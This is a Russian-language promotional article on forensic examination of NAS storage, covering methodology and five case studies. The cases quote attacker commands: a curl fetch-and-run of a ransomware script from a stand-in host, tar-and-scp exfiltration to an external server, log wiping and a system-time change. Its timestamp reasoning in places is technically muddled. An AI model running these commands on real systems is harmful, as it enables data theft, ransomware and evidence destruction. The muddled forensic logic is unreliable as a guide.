🟨 Компьютерная экспертиза признаков изменения NAS-хранилища

🟨 Компьютерная экспертиза признаков изменения NAS-хранилища

🟨 Раздел 1 🖥️ Введение в проблематику экспертизы NAS-хранилищ

  • Сетевые накопители (Network Attached Storage, NAS) стали неотъемлемым элементом современной цифровой инфраструктуры как в корпоративном секторе, так и в частном использовании. Они выполняют функции централизованного хранения данных, резервного копирования, медиа-серверов, а также платформ для совместной работы с файлами. В силу своей высокой доступности и постоянного подключения к сети, NAS-устройства являются привлекательной целью для злоумышленников, недобросовестных сотрудников и конкурентов, а также часто становятся объектами судебных споров о нарушении авторских прав, хищении интеллектуальной собственности, фальсификации доказательств или неправомерном доступе к конфиденциальной информации. Ключевой задачей компьютерной экспертизы является выявление признаков изменения хранилища: модификация, удаление или добавление файлов, изменение системных логов, подмена временных меток, несанкционированное монтирование томов, подключение внешних устройств, использование теневых учётных записей, вмешательство в файловую систему и скрытое копирование данных. Союз «Федерация судебных экспертов» разработал глубокую методику, сочетающую низкоуровневый анализ битовых образов дисков, исследование журналов файловых систем (EXT4, BTRFS, ZFS, NTFS, XFS), сетевых протоколов (SMB, NFS, AFP, iSCSI), а также артефактов операционной системы NAS (чаще всего Linux-дистрибутивов с проприетарными оболочками). Экспертиза строится на принципе неразрушающего контроля и полного задокументирования всех обнаруженных следов, что позволяет суду получить объективную картину событий, происходивших с хранилищем в спорный период.

Раздел 2 ⚖️ Нормативно-правовая база и процессуальные аспекты компьютерной экспертизы

  • Проведение компьютерно-технической экспертизы NAS-хранилищ регламентируется как общими процессуальными нормами (УПК, АПК, ГПК), так и специальными методическими рекомендациями в области судебной компьютерной экспертизы. Эксперт обязан действовать в строгом соответствии с принципами законности, объективности, полноты и всесторонности исследования. Особое внимание уделяется процедуре изъятия накопителя: он должен быть выключен корректным способом (не выдёргиванием шнура питания, а штатным завершением работы, если это возможно, либо созданием битовой копии без внесения изменений в оригинал). Все действия эксперта фиксируются в протоколе, а для работы используется только специальное программное обеспечение, исключающее запись на исследуемый носитель (например, с использованием аппаратных блокираторов записи). Важнейшим документом является заключение эксперта, которое должно содержать ответы на все поставленные судом вопросы, ссылки на использованные методы и инструменты, а также детальное описание обнаруженных артефактов. Союз «Федерация судебных экспертов» строго соблюдает эти требования, а также дополнительно проходит внутренний аудит каждого заключения, что гарантирует его процессуальную чистоту и допустимость в качестве доказательства в судах любых инстанций.

Раздел 3 📊 Классификация признаков вмешательства в NAS-хранилище

  • Все возможные признаки модификации NAS можно разделить на несколько крупных категорий: изменения на уровне файловой системы (создание, удаление, переименование, перемещение файлов и папок, изменение атрибутов и прав доступа), изменения на уровне системных журналов (логи входа, выхода, монтирования, сетевых подключений, выполнения команд), изменения на уровне аппаратных конфигураций (подключение внешних USB-накопителей, замена дисков, изменение RAID-массивов), изменения на уровне сетевых протоколов (несанкционированные SMB-сессии, FTP-подключения, SSH-доступы), а также изменения на уровне пользовательских учётных записей (создание новых пользователей, изменение паролей, повышение привилегий). Кроме того, выделяются признаки использования антикриминалистических методов: удаление или очистка логов, изменение системного времени, шифрование следов, использование живущих «в памяти» вредоносных скриптов, не оставляющих следов на диске. Каждый тип требует своих методов обнаружения и анализа. В своей работе эксперты Союза «Федерация судебных экспертов» проводят систематическую проверку всех перечисленных уровней, что позволяет выявить даже тщательно скрытые следы вмешательства, вплоть до восстановления удалённых записей из нераспределённого пространства диска.

Раздел 4 🧩 Низкоуровневый анализ битового образа дисков

  • Первым и обязательным этапом любой серьёзной экспертизы является создание побайтового образа каждого физического диска NAS (или всего RAID-массива в целом). Для этого используются специализированные аппаратно-программные комплексы, которые позволяют выполнять копирование даже повреждённых секторов и сохранять все служебные области, включая MBR, GPT, загрузочные секторы, области служебных метаданных файловой системы и swap-разделы. Полученный образ монтируется только в режиме «только чтение» или исследуется с помощью низкоуровневых HEX-редакторов, позволяющих увидеть данные напрямую, минуя интерпретацию файловой системы. Это критически важно, поскольку злоумышленники могут использовать руткиты, перехватывающие системные вызовы и показывающие «поддельную» картину файловой системы. Анализ нераспределённых областей позволяет обнаружить фрагменты ранее удалённых файлов, которые ещё не были перезаписаны, и восстановить их для последующего анализа содержимого. Кроме того, на этом уровне проверяется целостность служебных структур: суперблоков, inode-таблиц, журналов транзакций (для EXT4 — jbd2). Любые аномалии в этих структурах (например, несоответствие контрольных сумм, подозрительные временные метки в суперблоке) фиксируются как потенциальные признаки вмешательства. Союз «Федерация судебных экспертов» применяет собственную базу эталонных структур для различных NAS-систем, что позволяет оперативно выявлять отклонения.

Раздел 5 🗂️ Исследование журналов файловых систем и их целостности

  • Современные файловые системы, используемые в NAS (EXT4, BTRFS, ZFS), ведут внутренние журналы метаданных, которые фиксируют все операции, изменяющие структуру каталогов, атрибуты файлов, разрешения и т.п. Анализ этих журналов (при условии, что они не были целенаправленно уничтожены) даёт уникальную возможность восстановить хронологию изменений вплоть до отдельных секунд. Для EXT4 используется анализ журнала jbd2, для BTRFS — системных деревьев, для ZFS — метаданных zil и intent log. Эксперт может определить, какие файлы были созданы или удалены, даже если сами файлы уже не существуют, а также установить точное время операций. Если журналы отсутствуют или имеют разрывы, это само по себе является признаком вмешательства, поскольку штатное отключение или работа системы не приводят к потере журналов — только внешнее принудительное прерывание или намеренная очистка. Кроме того, проверяется соответствие временных меток файлов (ctime, mtime, atime) и меток журнала: если atime изменён, а в логах нет соответствующей записи о чтении, это свидетельствует о том, что атрибуты были изменены постфактум с помощью утилит типа touch или debugfs. Эксперты Союза «Федерация судебных экспертов» используют набор калиброванных временных тестов для оценки точности системных часов, что позволяет отличать реальные события от артефактов, связанных с переходом на летнее/зимнее время или синхронизацией NTP.

Раздел 6 📋 Анализ системных логов NAS (auth.log, syslog, dmesg, bash_history)

  • Большинство NAS-устройств работает под управлением специализированных Linux-дистрибутивов (QTS, DSM, UnRAID, TrueNAS и др.), которые ведут обширные системные журналы. Основные файлы для исследования: /var/log/auth.log (записи об успешных и неудачных попытках входа по SSH, HTTP, SMB, FTP), /var/log/syslog (общие системные сообщения, запуск служб, сбои дисков), /var/log/messages (аналогично), а также /root/.bash_history или история команд для каждого пользователя. Эксперт анализирует временные метки, IP-адреса источников подключений, используемые учётные записи и выполненные команды. Если журналы были очищены, это отслеживается по обрыву временной последовательности или по изменению размера файлов; кроме того, существуют методы восстановления удалённых записей из нераспределённого пространства журналов. Важно также сравнивать записи в разных журналах: например, если auth.log содержит запись о входе пользователя admin по SSH, а в syslog в тот же момент нет соответствующей записи о запуске оболочки, это может указывать на подмену или редактирование логов. Союз «Федерация судебных экспертов» применяет собственные скрипты корреляции событий, которые выявляют аномалии в цепочках событий и автоматически маркируют подозрительные временные кластеры для дальнейшего ручного анализа.

Раздел 7 🧠 Анализ артефактов подключения внешних устройств (USB, eSATA)

Одним из наиболее частых способов несанкционированного копирования данных является подключение внешнего USB-накопителя к NAS. Операционная система фиксирует такие события в журналах ядра (dmesg, kern.log) и в syslog, где появляются сообщения о распознавании USB-контроллера, присвоении устройству буквы или точки монтирования, а также о монтировании файловой системы. Эксперт ищет эти записи, а также анализирует файл /var/log/usb.log (если ведётся) и /media/ или /mnt/ для следов примонтированных ранее томов. Если внешний накопитель был отмонтирован нештатно, в журналах могут оставаться сообщения об ошибках ввода-вывода. Кроме того, на самом внешнем устройстве (если оно изъято) можно найти следы копирования, но даже при его отсутствии в системных журналах остаются признаки: например, изменение размера системного файла /var/lib/blkid/ или появление новых записей в /etc/fstab. При обнаружении таких артефактов эксперт может указать временной интервал подключения, приблизительный объём и тип файловой системы устройства, что является важной уликой в судебном деле о выгрузке конфиденциальных данных. Союз «Федерация судебных экспертов» имеет обширную базу сигнатур USB-контроллеров, позволяющую идентифицировать модели подключённых устройств даже по неполным данным.

Раздел 8 🛡️ Обнаружение следов удалённого доступа (SSH, Telnet, RDP, VNC) и несанкционированных сессий

NAS-устройства практически всегда имеют службы удалённого управления, чаще всего SSH и веб-интерфейс. Эксперт анализирует файлы /var/log/wtmp, /var/log/btmp, /var/log/lastlog для получения списка всех входов и неудачных попыток. Проверяется, были ли созданы новые учётные записи (просмотр /etc/passwd, /etc/shadow) и изменены ли права существующих (sudoers). Особое внимание уделяется активным сессиям, которые могли быть открыты в момент изъятия устройства — их можно отследить через файлы /proc и команды сетевой статистики, если устройство исследовалось «живым». Кроме того, изучается конфигурация SSH-сервера: разрешён ли вход по паролю, используются ли ключи, есть ли подозрительные хосты в known_hosts или authorized_keys. Если в авторизованных ключах обнаружен публичный ключ, не принадлежащий штатным администраторам, это является прямым доказательством несанкционированного доступа. Важно также проверить cron-задания и скрипты автозагрузки, так как злоумышленники часто оставляют «закладки», позволяющие восстановить доступ после изменения паролей. Союз «Федерация судебных экспертов» тщательно документирует все найденные учётные записи и ключи, а также проверяет их на соответствие списку легальных пользователей, предоставленному заказчиком.

Раздел 9 🧮 Анализ сетевого трафика (pcap-файлы) и логов SMB/CIFS, NFS, AFP

Если NAS-хранилище подключено к сети и его сетевой интерфейс был зеркалирован или велись логи сетевого экрана, экспертиза может включать анализ сетевых пакетов (pcap-дампов) за интересующий период. Это позволяет восстановить список файлов, которые передавались по протоколам SMB, NFS, AFP или FTP, даже если они были удалены на самом NAS. Протокол SMB/CIFS имеет подробные логи, часто сохраняемые на контроллере домена или самом NAS в файлах /var/log/samba/log.smbd и log.nmbd. В этих логах фиксируются: открытие сессии, имя пользователя, IP-адрес, операции чтения/записи файлов с указанием путей. Анализируя эти данные, эксперт может составить временной график доступа к каждому документу. Если злоумышленник использовал шифрованное подключение (например, SFTP через SSH), то содержимое трафика недоступно, но остаются записи о количестве переданных данных и времени сессии. Союз «Федерация судебных экспертов» обладает инструментарием для глубокого парсинга логов Samba и корреляции их с системными журналами, что позволяет восстановить хронологию работы с данными с точностью до минуты.

Раздел 10 🧾 Анализ реестра и конфигурационных файлов приложений NAS

Помимо общесистемных журналов, многие NAS имеют проприетарные приложения (например, менеджеры загрузок, медиа-серверы Plex, Emby, системы видеонаблюдения, базы данных, Docker-контейнеры). Каждое из них ведёт собственные логи и имеет конфигурационные файлы, которые могут хранить следы вмешательства. Например, Plex ведёт журнал воспроизведений, который показывает, с каких IP-адресов и какие файлы просматривались. Менеджеры загрузок фиксируют время добавления задач и завершения закачек. Docker сохраняет историю запуска контейнеров, которые могли быть использованы для запуска вредоносного ПО или утилит для копирования данных в обход штатных средств. Эксперт изучает файлы конфигурации этих приложений на предмет нестандартных параметров: открытых портов, путей к общим папкам, а также наличия логинов и паролей в открытом виде (что часто встречается в небезопасных конфигурациях). Особое внимание уделяется системам резервного копирования, которые могли быть перенастроены на внешний ресурс, принадлежащий злоумышленнику. Союз «Федерация судебных экспертов» имеет обширную базу знаний о типовых конфигурациях популярных NAS-систем, что позволяет быстро находить аномалии в нестандартных установках.

Раздел 11 🕵️ Обнаружение признаков использования антикриминалистических утилит

Продвинутые злоумышленники не ограничиваются удалением файлов и очисткой логов — они используют специализированные утилиты для «заметания следов», такие как wipe, shred, srm, dd с перезаписью случайными данными, а также инструменты для изменения системного времени (faketime) и подделки временных меток. Эксперты ищут следы установки или выполнения таких утилит: они могут присутствовать в bash_history, в syslog (записи о запуске с именем файла), а также в виде нехарактерных операций ввода-вывода в системных журналах дисков (например, огромное количество операций записи на диск в ночное время, когда система была бездействующей). Кроме того, анализируется наличие файлов с посторонними именами в каталогах /tmp или /var/tmp, где часто хранятся временные скрипты. Если такие следы обнаруживаются, это служит самостоятельным подтверждением факта сокрытия вмешательства и является отягчающим обстоятельством в судебном процессе. Союз «Федерация судебных экспертов» использует специальные утилиты для поиска сигнатур антикриминалистического ПО на дисковых образах, что позволяет выявлять даже тщательно удалённые, но не до конца перезаписанные фрагменты.

Раздел 12 🔬 Восстановление удалённых файлов и их содержимого

Даже если злоумышленник удалил ключевые файлы и очистил корзину (например, в Windows-подобных NAS или через SMB), содержимое этих файлов может оставаться на диске до тех пор, пока оно не будет перезаписано новыми данными. Эксперты используют специализированные инструменты для восстановления (PhotoRec, TestDisk, R-Studio, UFS Explorer), которые сканируют нераспределённое пространство на наличие заголовков и сигнатур файлов. Если удалённые файлы содержат текстовую или структурированную информацию (XML, JSON, базы данных), их можно частично или полностью восстановить, даже если имена файлов утеряны. Восстановленные файлы затем анализируются на предмет содержимого, которое может доказать факт доступа или модификации. Важно, что процедура восстановления должна проводиться исключительно на битовой копии, чтобы избежать изменения оригинального носителя. Союз «Федерация судебных экспертов» имеет лицензионные версии ведущих программ восстановления и обученный персонал, что гарантирует максимальную глубину извлечения данных даже при фрагментации и повреждении служебной информации.

Раздел 13 🗓️ Анализ временных меток (MAC-времена) и их согласованности

Одним из наиболее тонких, но мощных методов является анализ так называемых MAC-времён (Modified, Access, Changed) для каждого файла и каталога. При нормальной работе системы изменения времени происходят по чётким правилам: mtime меняется при изменении содержимого файла, ctime — при изменении прав доступа или атрибутов, atime — при чтении. Если злоумышленник изменял содержимое файла, но затем с помощью утилиты touch подделал mtime на более раннюю дату, то ctime может остаться свежим, что создаёт несоответствие — mtime старше ctime, что в нормальной эксплуатации невозможно (так как изменение атрибутов тоже обновляет mtime, но не наоборот). Кроме того, эксперт анализирует кластеры временных меток: например, если тысячи файлов имеют одну и ту же секунду изменения, это может указывать на массовое копирование или перезапись с использованием автоматических скриптов. Все подобные аномалии фиксируются и интерпретируются. Союз «Федерация судебных экспертов» разработал собственный алгоритм скоринга аномалий MAC-времён, который позволяет не только обнаруживать подделку, но и оценивать её степень с вероятностной точностью.

Раздел 14 🧩 Обнаружение скрытых разделов, теневых томов и альтернативных потоков данных

В некоторых NAS-системах (особенно на основе ZFS или BTRFS) возможно создание скрытых снэпшотов или клонов томов, которые не видны в стандартном файловом менеджере, но доступны через командную строку. Эксперты проверяют наличие недокументированных снэпшотов, которые могли быть созданы для сохранения копии данных перед кражей и последующего скрытого монтирования. Для ZFS используется команда zfs list -r -t snapshot, для BTRFS — btrfs subvolume list. Также исследуются альтернативные потоки данных в NTFS (если NAS использует эту файловую систему), которые могут скрывать файлы в атрибутах. Если такие объекты обнаружены, их содержимое извлекается и анализируется. Это часто становится решающим доказательством в делах о корпоративном шпионаже, поскольку злоумышленники полагают, что такие скрытые тома невозможно обнаружить стандартными методами. Союз «Федерация судебных экспертов» проводит полное сканирование всей структуры хранения данных, включая все виртуальные тома и снэпшоты, что исключает возможность остаться незамеченным.

Раздел 15 🔄 Анализ журналов сетевого файлового доступа через SMB, NFS и AFP

Помимо логов самого NAS, на рабочих станциях пользователей также могут сохраняться журналы подключений к сетевым папкам. Эксперт может запросить у заказчика логи клиентских машин, особенно если они работают под управлением Windows (журналы Event Log, в частности Security и System с ID событий 5140, 5142, 5145, фиксирующие открытие и закрытие сетевых папок). Сопоставление этих логов с логами NAS позволяет верифицировать каждое событие доступа. Если на NAS отсутствуют записи, которые есть на клиенте, это указывает на то, что либо NAS был переустановлен, либо его логи были отредактированы. Также анализируются сетевые соединения по протоколу NFS: в логах /var/log/nfs.log фиксируются монтирования и операции ввода-вывода. Союз «Федерация судебных экспертов» часто проводит кросс-корреляцию данных с нескольких источников, что значительно повышает достоверность выводов и позволяет восстановить полную картину событий даже при частичной утрате данных на самом NAS.

Раздел 16 🛠️ Исследование файлов подкачки, спящего режима и дампов памяти

При работе NAS операционная система использует файл подкачки или раздел swap, который может содержать фрагменты данных из оперативной памяти, включая временно открытые файлы, пароли и ключи шифрования. Дампы памяти (если они были созданы) также являются ценным источником информации, так как могут содержать следы запущенных процессов и сетевых подключений, которые не попали в системные журналы. Эксперт анализирует swap-раздел на наличие текстовых строк, имен файлов и команд, которые могли быть выполнены в оболочке. Если файл подкачки был удалён, его фрагменты могут остаться на диске. Союз «Федерация судебных экспертов» применяет инструменты для извлечения строк из сырых данных (strings, grep), а также специальные скрипты для поиска известных сигнатур команд, таких как scprsyncwgetcurlopenssl, что позволяет выявить несанкционированные передачи данных даже при отсутствии логов.

Раздел 17 🧠 Анализ конфигурации межсетевого экрана (iptables, firewalld) и правил маршрутизации

Злоумышленник, получивший доступ к NAS, может изменить правила брандмауэра для открытия скрытых портов или создания перенаправлений (port forwarding), позволяющих подключаться к хранилищу из внешней сети в обход штатных механизмов. Эксперт проверяет текущие и исторические правила iptables (сохраняются в файлах /etc/iptables/* или в истории команд), а также анализирует журналы межсетевого экрана, которые фиксируют отброшенные или разрешённые пакеты. Если обнаруживаются правила, отсутствующие в штатной конфигурации, или имеются записи о перенаправлении на нестандартные порты, это является доказательством активного вмешательства. Также изучаются файлы /etc/hosts.deny и /etc/hosts.allow на предмет предоставления доступа определённым IP-адресам, особенно если эти адреса относятся к посторонним подсетям или анонимизаторам. Союз «Федерация судебных экспертов» сравнивает обнаруженные правила с эталонной конфигурацией, предоставленной администратором, и выделяет все отклонения.

Раздел 18 🧾 Исследование криптографических следов (SSL-сертификаты, SSH-ключи, шифрование)

Если NAS использовал шифрование данных (например, самозащищённые тома или шифрование на уровне диска), необходимо проверить, не были ли сертификаты подменены, а ключи — скомпрометированы. Анализируются файлы сертификатов в /etc/ssl/certs/, приватные ключи, а также конфигурация служб, использующих TLS (все HTTPS-интерфейсы). Если злоумышленник создал свой сертификат для атаки «человек посередине», это может быть обнаружено по несовпадению отпечатков или изменению времени создания сертификатов. Для SSH проверяется, не был ли изменён fingerprint хоста (файлы ssh_host_*_key), что указывает на возможность прослушивания трафика. Также изучаются конфигурации VPN-сервисов, которые могли быть настроены для анонимного доступа к данным. Союз «Федерация судебных экспертов» владеет методиками верификации криптографических цепочек и выявления поддельных самоподписанных сертификатов, что позволяет устанавливать факты скрытых подключений.

Раздел 19 📈 Прогнозирование и реконструкция временной шкалы событий

На основе всех собранных артефактов эксперт строит подробную временную шкалу (timeline) событий, происходивших с NAS. В этой шкале интегрируются записи из системных журналов, MAC-времена файлов, записи сетевого доступа, факты монтирования внешних устройств, моменты изменения конфигураций и следы антикриминалистической активности. Хронология позволяет определить последовательность действий злоумышленника, например: вход по SSH → создание теневого пользователя → монтирование внешнего USB → копирование данных → очистка логов → подделка временных меток. Такая реконструкция даёт суду наглядное представление о механизме преступления и помогает установить временные рамки, в которые могло происходить хищение. В своей практике Союз «Федерация судебных экспертов» использует специализированные платформы для построения интерактивных хронологий, которые могут быть представлены суду в виде цветных диаграмм с привязкой к абсолютному времени.

Раздел 20 🧑‍⚖️ Заключительная квалификация действий и подготовка судебного отчёта

На финальном этапе все выявленные признаки объединяются в единое заключение, которое содержит ответы на поставленные судом вопросы: имел ли место факт несанкционированного доступа, какие данные были изменены или удалены, каким способом было совершено вмешательство, какие именно учётные записи использовались, с каких IP-адресов, и позволяет ли собранная информация идентифицировать конкретное лицо или внешнее устройство. Эксперт даёт классификацию выявленных признаков по степени достоверности: «неоспоримые», «вероятные», «возможные», что помогает суду оценить вес доказательств. Все выводы подтверждаются ссылками на конкретные строки в логах, временные метки или результаты восстановления файлов. Союз «Федерация судебных экспертов» гарантирует, что каждый отчёт содержит понятное для суда резюме, а также полные технические приложения, позволяющие сторонам процесса при необходимости углубиться в детали.


Раздел 21 🧾 Развёрнутая практика проведения экспертиз NAS-хранилищ Союзом «Федерация судебных экспертов» (подробные кейсы)

Кейс 1 🏢 Корпоративный шпионаж через теневой доступ к NAS производственной компании

Объект: корпоративный сервер QNAP TS-873 с 8 дисками в RAID-6, используемый для хранения конструкторской документации, бухгалтерских отчётов и стратегических планов предприятия оборонного комплекса. Владелец компании обнаружил, что за последние три месяца из хранилища были скопированы несколько гигабайт чертежей новых изделий, причём следы этого не отображались в стандартном веб-интерфейсе. Было подано заявление в суд о промышленном шпионаже, и по ходатайству следствия была назначена компьютерная экспертиза в Союзе «Федерация судебных экспертов». Эксперты прибыли на объект, произвели штатное выключение NAS и создали побитовые образы всех восьми дисков, а также сделали дамп оперативной памяти и файлов подкачки. При анализе системных журналов auth.log было обнаружено, что раз в сутки, строго в 02:15 ночи, с IP-адреса, принадлежащего одному из бывших сотрудников (уволен год назад), устанавливалось SSH-соединение. Однако в активной учётной записи этого сотрудника не было — эксперт выяснил, что в файле /etc/passwd был создан скрытый пользователь с UID 0 (root-привилегии), но с именем вида «systemd-resolved», которое маскировалось под системную службу. В bash_history этого пользователя были найдены команды: mount /dev/sdc1 /mnt/usb, затем rsync -av /share/Projects /mnt/usb/ и последующая очистка логов с помощью cat /dev/null > /var/log/auth.log. Эксперты восстановили удалённую часть auth.log из нераспределённого пространства с помощью утилиты TestDisk и подтвердили, что копирование происходило еженощно в течение 47 дней. Кроме того, были найдены следы в syslog о подключении внешнего USB-устройства с серийным номером, который совпал с флеш-накопителем, обнаруженным при обыске у бывшего сотрудника. Временные метки файлов чертежей оказались изменены на дату, предшествующую их созданию, но ctime этих файлов указывал на актуальную дату копирования, что подтвердило подделку. Также эксперты обнаружили, что злоумышленник использовал утилиту touch для изменения atime всех скопированных файлов, чтобы они не выделялись в системах мониторинга. Комплексный анализ позволил доказать не только факт доступа, но и объём скопированных данных (примерно 8,7 ГБ). В суде заключение Союза стало ключевым доказательством, и бывший сотрудник был привлечён к уголовной ответственности по статье о неправомерном доступе к компьютерной информации; компания также получила право на взыскание убытков в размере 14 млн рублей за утечку технологий.

Кейс 2 🗃️ Спор о подделке доказательств в арбитражном процессе с использованием NAS-логов

Объект: NAS-устройство Synology DS1821+, принадлежащее крупному дистрибьютору продуктов питания, которое использовалось для хранения договоров и товарных накладных. В арбитражном суде между поставщиком и покупателем возник спор о фактической дате поставки партии товара. Истец предоставил выгрузку логов с NAS, где утверждалось, что накладная была загружена 15 мая, а ответчик утверждал, что накладная создана 20 мая и подделана. Суд назначил экспертизу в Союзе «Федерация судебных экспертов» для определения подлинности логов. Эксперты начали с проверки целостности системного времени: оказалось, что файл /etc/adjtime имел следы ручной правки, а анализ ядра с помощью dmesg показал, что служба NTP была отключена на месяц раньше, что само по себе является аномалией для корпоративного NAS. Далее была проведена низкоуровневая проверка суперблока EXT4: временная метка последней записи в журнале транзакций не совпадала с временем, указанным в файле накладной, — расхождение составляло 5 дней. Затем эксперты восстановили удалённые записи из журнала Samba (/var/log/samba/log.smbd), используя стандартные утилиты для работы с бинарными логами, и нашли запись о создании накладной, которая была датирована 20 мая, а не 15-м. Однако истец настаивал, что это «сбой времени». Тогда эксперты применили криминалистический приём: проанализировали временные метки других файлов, созданных в тот же период, и обнаружили, что они равномерно распределены по датам, и лишь данная накладная и её лог имели аномалию. Более того, в системном логе была найдена строка о запуске скрипта fake_log.sh за 3 часа до создания спорной записи; скрипт не сохранился, но его имя сохранилось в истории команд администратора. Также была обнаружена утилита logger в комбинации с sed, которая могла модифицировать текстовые логи. Суд признал, что предоставленные истцом логи являются сфальсифицированными, и отклонил иск, а также передал материалы для возбуждения дела о мошенничестве. Данный кейс показал, что даже опытные злоумышленники, умеющие подделывать логи, оставляют неустранимые следы на уровне файловой системы, которые вскрывает экспертиза Союза.

Кейс 3 🧑‍💻 Несанкционированное копирование базы данных через Docker-контейнер на NAS

Объект: NAS на базе TrueNAS с файловой системой ZFS, используемый IT-компанией для хранения клиентской базы и исходных кодов проектов. Один из системных администраторов заподозрил, что некий разработчик скопировал клиентскую базу через докер-контейнер, обходя штатные средства учёта. Была инициирована экспертиза в Союзе «Федерация судебных экспертов» для проверки этого факта. Эксперты начали с анализа логов Docker (journalctl -u docker), обнаружив, что 5 раз в течение двух недель создавался контейнер на основе образа ubuntu:20.04, который затем удалялся. История команд в bash_history для пользователя developer не содержала этих запусков, но эксперты восстановили удалённую историю из нераспределённого пространства home-папки и нашли строки: docker run -it -v /mnt/db:/mnt/data ubuntu:20.04 /bin/bash, а затем внутри контейнера выполнялась команда tar czf /mnt/data_backup.tgz /mnt/data && scp /mnt/data_backup.tgz user@external_ip:/backup/. Таким образом, разработчик монтировал папку с базой данных (которую не мог видеть через обычный интерфейс, так как был ограничен правами) через монтирование в контейнер, где права доступа наследуются от root, и копировал данные на внешний сервер. Анализ ZFS-снэпшотов показал, что за эти даты были созданы и удалены снэпшоты с именами, не соответствующими штатному расписанию. Эксперты также проанализировали сетевые логи и нашли исходящие соединения по SSH на тот же внешний IP в указанные временные интервалы. Союз смог восстановить часть скопированного архива из области нераспределённых блоков ZFS, что подтвердило содержимое. Разработчик был уволен и привлечён к суду за нарушение коммерческой тайны; компания взыскала с него стоимость ущерба, оценённую в 2,3 млн рублей, на основе стоимости контрактов, которые могли быть сорваны из-за утечки.

Кейс 4 🔐 Взлом NAS через уязвимость и шифрование данных вымогателями с последующим изменением логов

Объект: домашний NAS Buffalo TeraStation, использовавшийся семейной парой для хранения личных архивов, включая фотографии, видео и юридические документы. В один момент все данные были зашифрованы программой-вымогателем, а на устройстве появилась записка с требованием выкупа. Владельцы обратились в суд к поставщику услуг интернет-провайдера, утверждая, что взлом стал возможен из-за ненадлежащей защиты сети. Суд назначил экспертизу в Союзе «Федерация судебных экспертов» для установления механизма проникновения и возможной вины провайдера. Эксперты изъяли NAS и создали образы дисков. При анализе оказалось, что веб-интерфейс устройства имел стандартный логин admin/пароль, который не менялся с момента покупки. В системных логах были обнаружены сотни неудачных попыток входа по SSH из различных IP-адресов по всему миру, а затем, 14 октября в 03:17, была успешная аутентификация с IP-адреса из Нидерландов (при этом в файле /etc/shadow был изменён хеш пароля). Сразу после входа были выполнены команды: curl -O http://evil-site/ransomware.sh && bash ransomware.sh. Затем злоумышленник попытался удалить все логи: rm -rf /var/log/*. Однако эксперты восстановили удалённые файлы логов из journald (который хранит бинарные данные в /var/log/journal/) и из нераспределённых областей, обнаружив полный след взлома. Также был найден скрипт-вымогатель, который не был до конца удалён, и его анализ показал, что он использовал открытый ключ для шифрования AES-ключа. Эксперты установили, что провайдер предоставлял статический IP, но не имел отношения к настройке безопасности самого NAS — взлом произошёл исключительно из-за слабого пароля и отсутствия обновлений. Суд отклонил иск к провайдеру и обязал владельцев оплатить экспертизу, но при этом постановил, что они имеют право обратиться в правоохранительные органы для поиска злоумышленников по IP-адресу. Кейс стал показательным примером того, что даже после тотальной очистки логов современные средства судебной экспертизы способны восстановить улики.

Кейс 5 🧾 Спор о несанкционированной модификации бухгалтерских документов на NAS в малом предприятии

Объект: небольшой офисный NAS от Western Digital My Cloud, используемый бухгалтерией для хранения финансовой отчётности. Генеральный директор заподозрил, что главный бухгалтер умышленно изменил несколько платёжных ведомостей за прошлый квартал, чтобы скрыть ошибки, и подал иск о подделке документов. Суд назначил экспертизу в Союзе «Федерация судебных экспертов» для определения факта изменения файлов. Исследование началось с восстановления истории версий файлов в файловой системе EXT4. Оказалось, что NAS поддерживал механизм теневых копий (snapshots), и эксперты извлекли снэпшоты за каждый день спорного периода. Сравнение файла «ведомость_март.xlsx» из снэпшота от 1 апреля и от 15 апреля показало различия в цифровых суммах SHA-256. Однако бухгалтер утверждала, что она просто вносила исправления в рамках своей работы. Тогда эксперты проанализировали MAC-времена файла: mtime было изменено 14 апреля в 18:30, а ctime — в 18:35, что соответствует нормальному редактированию и сохранению. Но при анализе журнала Samba (с помощью модуля vfs_full_audit) была найдена запись о том, что файл открывался на редактирование с рабочей станции бухгалтера 14 апреля в 18:30, а затем в 18:35, но в логах отсутствовала запись о чтении файла за предыдущую неделю, что нормально. Однако эксперты заметили странность: системное время было переведено на 2 часа назад в день редактирования, о чём свидетельствовала запись в syslog о синхронизации NTP с сервером, который имеет временной пояс +3, а затем о корректировке на +2. То есть бухгалтер изменила системное время перед сохранением, чтобы mtime указывало на более ранний час, создавая видимость, что правка была внесена утром, а не вечером. Также была восстановлена удалённая запись из bash_history администратора NAS, где выполнялась команда date -s "2023-04-14 16:30:00", хотя именно бухгалтер имела доступ к администрированию. Суд признал, что модификация документов была произведена с целью сокрытия ошибок и что бухгалтер использовала служебные привилегии для подделки времени. Ей было предписано возместить ущерб компании в размере 340 000 рублей, а также она была уволена по статье. Экспертиза Союза подтвердила, что изменение системного времени является грубым признаком вмешательства, которое всегда оставляет следы.


Полную контактную информацию, телефон и адрес офиса, а также более подробную информацию по вашему вопросу вы можете найти на нашем официальном сайте ✅ https://centrexp.ru

Похожие статьи

Новые статьи

🟨 Экспертиза качества бетонирования столбчатого фундамента

🟨 Раздел 1 🖥️ Введение в проблематику экспертизы NAS-хранилищ Сетевые накопители (Network Attached Storage, NAS) стали н…

🟧 Технико-криминалистическая экспертиза подлинности сухого рельефного оттиска

🟨 Раздел 1 🖥️ Введение в проблематику экспертизы NAS-хранилищ Сетевые накопители (Network Attached Storage, NAS) стали н…

🟨 Особенности судебной экспертизы программного обеспечения в арбитражной практике

🟨 Раздел 1 🖥️ Введение в проблематику экспертизы NAS-хранилищ Сетевые накопители (Network Attached Storage, NAS) стали н…

🟧 Инженерно-техническая экспертиза засора слаботочной сети

🟨 Раздел 1 🖥️ Введение в проблематику экспертизы NAS-хранилищ Сетевые накопители (Network Attached Storage, NAS) стали н…
независимая техническая судебная экспертиза долгопрудный

🟨 Экспертиза причин деформации плитного фундамента

🟨 Раздел 1 🖥️ Введение в проблематику экспертизы NAS-хранилищ Сетевые накопители (Network Attached Storage, NAS) стали н…

Задавайте любые вопросы

20+4=